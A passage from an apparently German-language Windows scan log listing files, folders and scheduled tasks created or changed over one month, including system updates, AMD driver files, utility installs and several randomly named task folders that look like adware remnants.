2016-04-15 17:10 - 2016-03-16 05:40 - 00158208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 03363328 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-04-15 17:10 - 2016-03-16 05:38 - 01423872 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 01521664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00752640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 01205248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00068608 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 01794560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00607744 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxApplicabilityEngine.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-04-15 17:10 - 2016-03-16 05:34 - 01871872 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2016-04-15 17:10 - 2016-03-16 05:33 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-04-15 17:10 - 2016-03-16 05:32 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-04-15 17:10 - 2016-03-16 05:28 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
2016-04-15 17:10 - 2016-03-16 05:27 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-04-15 17:10 - 2016-03-16 05:21 - 18796544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-04-15 17:10 - 2016-03-16 05:20 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-04-15 17:10 - 2016-03-16 05:18 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-04-15 17:10 - 2016-03-16 05:18 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 03680256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vaultcli.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-04-15 17:10 - 2016-03-16 05:16 - 00311808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00625152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00579584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00928256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00525312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00131072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-04-15 17:10 - 2016-03-16 05:12 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-04-15 17:10 - 2016-03-16 05:11 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2016-04-15 17:10 - 2016-03-16 05:10 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-04-15 16:58 - 2016-04-15 16:58 - 00000000 ____D C:\ProgramData\FwinpF
2016-04-12 18:21 - 2016-04-15 18:00 - 00000000 ____D C:\WINDOWS\Panther
2016-04-12 16:42 - 2016-04-12 16:42 - 00194320 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\TeeDriverW8x64.sys
2016-04-11 20:03 - 2016-04-11 23:21 - 00002278 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-04-11 20:03 - 2016-04-11 20:03 - 00000870 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-04-11 20:03 - 2016-04-11 20:03 - 00000000 ____D C:\Program Files\CCleaner
2016-04-11 15:49 - 2016-04-11 15:49 - 00002904 _____ C:\WINDOWS\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2016-04-11 13:27 - 2016-04-11 13:27 - 00001299 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Radeon Settings.lnk
2016-04-10 22:05 - 2016-04-10 22:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-04-10 21:55 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\PlaysTV
2016-04-10 21:55 - 2016-04-10 21:55 - 00002099 _____ C:\Users\Public\Desktop\Raptr.lnk
2016-04-10 21:55 - 2016-04-10 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Raptr
2016-04-10 21:55 - 2016-04-10 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2016-04-10 21:54 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Raptr
2016-04-10 17:33 - 2016-04-11 15:26 - 00000000 ____D C:\ProgramData\Xfire
2016-04-10 17:33 - 2016-04-11 13:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Xfire
2016-04-10 17:32 - 2016-04-10 17:32 - 00002217 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-04-10 17:32 - 00002205 _____ C:\Users\Public\Desktop\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-03-29 12:06 - 00053008 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\TURegOpt.exe
2016-04-10 17:32 - 2016-03-29 11:53 - 00044304 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\authuitu.dll
2016-04-10 17:32 - 2016-03-29 11:53 - 00039696 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\SysWOW64\authuitu.dll
2016-04-10 17:31 - 2016-04-19 12:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Users\Harun\AppData\Local\AvgSetupLog
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\ProgramData\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Program Files (x86)\AVG
2016-04-05 09:41 - 2016-04-05 09:41 - 00874000 _____ (AMD) C:\WINDOWS\system32\SETAA8A.tmp
2016-04-05 09:41 - 2016-04-04 04:25 - 00865280 _____ (AMD) C:\WINDOWS\system32\coinst_16.15.dll
2016-04-05 08:47 - 2016-04-05 08:47 - 00365824 _____ C:\WINDOWS\system32\ativvaxy_el_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00322612 _____ C:\WINDOWS\system32\ativvaxy_vi.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00320944 _____ C:\WINDOWS\system32\ativvaxy_vi_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00264736 _____ C:\WINDOWS\system32\ativvaxy_stn_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00260640 _____ C:\WINDOWS\system32\ativvaxy_cz_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00254804 _____ C:\WINDOWS\system32\ativvaxy_FJ.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00251856 _____ C:\WINDOWS\system32\ativvaxy_FJ_nd.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00857576 _____ C:\WINDOWS\system32\amdicdxx.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00234292 _____ C:\WINDOWS\system32\ativvaxy_cik.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00232496 _____ C:\WINDOWS\system32\ativvaxy_cik_nd.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00177280 _____ C:\WINDOWS\system32\ativce03.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00175584 _____ C:\WINDOWS\system32\amde31a.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00166624 _____ C:\WINDOWS\system32\amde34b.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00166624 _____ C:\WINDOWS\system32\amde34a.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00100832 _____ C:\WINDOWS\system32\ativce02.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00009184 _____ C:\WINDOWS\system32\AMDKernelEvents.man
2016-04-05 08:46 - 2016-04-05 08:46 - 00000144 _____ C:\WINDOWS\SysWOW64\amd-vulkan32.json
2016-04-05 08:46 - 2016-04-05 08:46 - 00000144 _____ C:\WINDOWS\system32\amd-vulkan64.json
2016-04-04 06:16 - 2016-04-04 06:16 - 00458472 _____ C:\WINDOWS\system32\amdmiracast.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00141792 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00128384 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00110880 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2016-04-04 06:12 - 2016-04-04 06:12 - 00296648 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Drivers\amdacpksd.sys
2016-04-04 05:32 - 2016-04-04 05:32 - 00701440 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2016-04-04 05:30 - 2016-04-04 05:30 - 00580096 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2016-04-04 05:29 - 2016-04-04 05:29 - 00127488 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 06884864 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 00113664 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2016-04-04 05:27 - 2016-04-04 05:27 - 00235008 _____ C:\WINDOWS\system32\clinfo.exe
2016-04-04 05:26 - 2016-04-04 05:26 - 48211968 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl64.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00065024 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00059392 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2016-04-04 05:15 - 2016-04-04 05:15 - 26887168 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl12cl64.dll
2016-04-04 05:11 - 2016-04-04 05:11 - 06956032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2016-04-04 05:02 - 2016-04-04 05:02 - 05398016 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmantle32.dll
2016-04-04 05:00 - 2016-04-04 05:00 - 05420032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00134656 _____ C:\WINDOWS\system32\amdhdl64.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00123392 _____ C:\WINDOWS\SysWOW64\amdhdl32.dll
2016-04-04 04:47 - 2016-04-04 04:47 - 30377984 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atio6axx.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\system32\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00097280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00089600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2016-04-04 04:37 - 2016-04-04 04:37 - 08473088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2016-04-04 04:25 - 2016-04-04 04:25 - 25069056 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atioglxx.dll
2016-04-04 04:22 - 2016-04-04 04:22 - 06667776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00367104 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2016-04-04 04:14 - 2016-04-04 04:14 - 00062464 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalrt64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00055808 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalcl64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00052224 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalrt.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 15711744 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticaldd64.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 00049152 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalcl.dll
2016-04-04 04:10 - 2016-04-04 04:10 - 14302208 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticaldd.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00564736 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00224256 _____ C:\WINDOWS\system32\dgtrayicon.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00209920 _____ C:\WINDOWS\system32\GameManager64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00204800 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00189952 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00186368 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00162304 _____ C:\WINDOWS\system32\atieah64.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00145408 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00078336 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2016-04-04 03:56 - 2016-04-04 03:56 - 00251392 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2016-04-04 03:55 - 2016-04-04 03:55 - 00190976 _____ (AMD) C:\WINDOWS\system32\atitmm64.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00050688 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl6.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00039424 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmmcl.dll
2016-04-04 03:52 - 2016-04-04 03:52 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2016-04-04 03:42 - 2016-04-04 03:42 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2016-04-04 03:34 - 2016-04-04 03:34 - 00089088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2016-04-04 03:34 - 2016-04-04 03:34 - 00080896 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00157696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00075776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6pxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiglpxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiglpxx.dll
2016-04-04 03:29 - 2016-04-04 03:29 - 00043520 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\ati2erec.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00195072 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00174592 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2016-04-03 23:27 - 2016-04-03 23:27 - 02412544 _____ C:\WINDOWS\system32\amdacpusl.pdb
2016-04-03 23:16 - 2016-04-03 23:16 - 00364544 _____ (Advanced Micro Devices) C:\WINDOWS\system32\amdacpusl.dll
2016-04-03 23:16 - 2016-04-03 23:16 - 00306176 _____ C:\WINDOWS\system32\amdacpusl.pdb.pub
2016-04-03 23:16 - 2016-04-03 23:16 - 00248832 _____ (Advanced Micro Devices) C:\WINDOWS\SysWOW64\amdacpusl.dll
2016-04-01 10:14 - 2016-04-10 20:40 - 00000000 ____D C:\Program Files (x86)\eAHPeNhIUJ
2016-04-01 10:14 - 2016-04-01 20:34 - 00014860 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateUA
2016-04-01 10:14 - 2016-04-01 20:34 - 00014834 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJCheckTask
2016-04-01 10:14 - 2016-04-01 20:34 - 00003924 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateCore
2016-04-01 10:14 - 2016-04-01 10:14 - 00000000 ____D C:\Users\Public\Documents\eAHPeNhIUJ
2016-04-01 10:14 - 2016-04-01 10:14 - 00000000 ____D C:\ProgramData\eAHPeNhIUJ
2016-03-30 20:14 - 2016-03-30 20:14 - 00000000 _____ C:\Users\Harun\AppData\Roaming\dc.ogt
2016-03-30 13:15 - 2016-03-30 13:15 - 00015110 _____ C:\WINDOWS\System32\Tasks\ffgogogoCheckTask
2016-03-30 13:12 - 2016-03-30 13:12 - 00004200 _____ C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateCore
2016-03-30 13:11 - 2016-03-30 13:11 - 00015136 _____ C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateUA
2016-03-30 13:08 - 2016-03-30 13:08 - 00000000 ____D C:\Users\Harun\AppData\Local\ffgogogo
2016-03-30 13:05 - 2016-03-30 13:05 - 00000000 ____D C:\Users\Public\Documents\ffgogogo
2016-03-30 13:05 - 2016-03-30 13:05 - 00000000 ____D C:\Users\Harun\AppData\Roaming\ffgogogo
2016-03-24 21:44 - 2016-03-24 21:44 - 00000000 ____D C:\Users\Harun\AppData\Local\TeamViewer
2016-03-23 19:02 - 2016-03-23 19:02 - 00000000 ____D C:\Users\Harun\AppData\Roaming\MCorp

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-19 17:12 - 2015-07-29 12:41 - 00001136 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-19 16:16 - 2015-07-29 13:31 - 01790124 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-19 16:16 - 2015-07-10 18:34 - 00771100 _____ C:\WINDOWS\system32\perfh007.dat
2016-04-19 16:16 - 2015-07-10 18:34 - 00153964 _____ C:\WINDOWS\system32\perfc007.dat
2016-04-19 16:16 - 2015-07-10 13:02 - 00000000 ____D C:\WINDOWS\INF
2016-04-19 16:12 - 2015-07-29 12:41 - 00001132 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-19 16:11 - 2016-03-08 16:24 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-04-19 16:11 - 2015-08-01 18:48 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2016-04-19 16:11 - 2015-07-10 14:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-19 16:11 - 2015-07-10 11:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-19 15:44 - 2015-07-29 16:37 - 00000000 ____D C:\Program Files (x86)\Avira
2016-04-19 15:38 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Battle.net
2016-04-19 14:41 - 2015-07-29 16:36 - 00000000 ____D C:\ProgramData\Package Cache
2016-04-19 12:45 - 2015-07-31 18:06 - 00002306 _____ C:\WINDOWS\System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD}
2016-04-19 12:45 - 2015-07-31 18:05 - 00002306 _____ C:\WINDOWS\System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B}
2016-04-19 12:45 - 2015-07-29 12:41 - 00003648 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-04-19 12:45 - 2015-07-29 12:41 - 00003424 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-04-19 12:43 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-19 12:39 - 2015-09-16 17:58 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-04-19 12:38 - 2015-09-16 17:58 - 00002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-04-19 12:37 - 2015-07-29 14:04 - 00004156 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{72B71363-67D7-4D80-A0FC-60FE645FEBE1}
2016-04-19 12:37 - 2015-07-10 13:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-19 12:34 - 2016-02-02 15:15 - 00000000 ___RD C:\Users\Harun\OneDrive
2016-04-19 12:34 - 2015-07-29 13:30 - 00002429 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
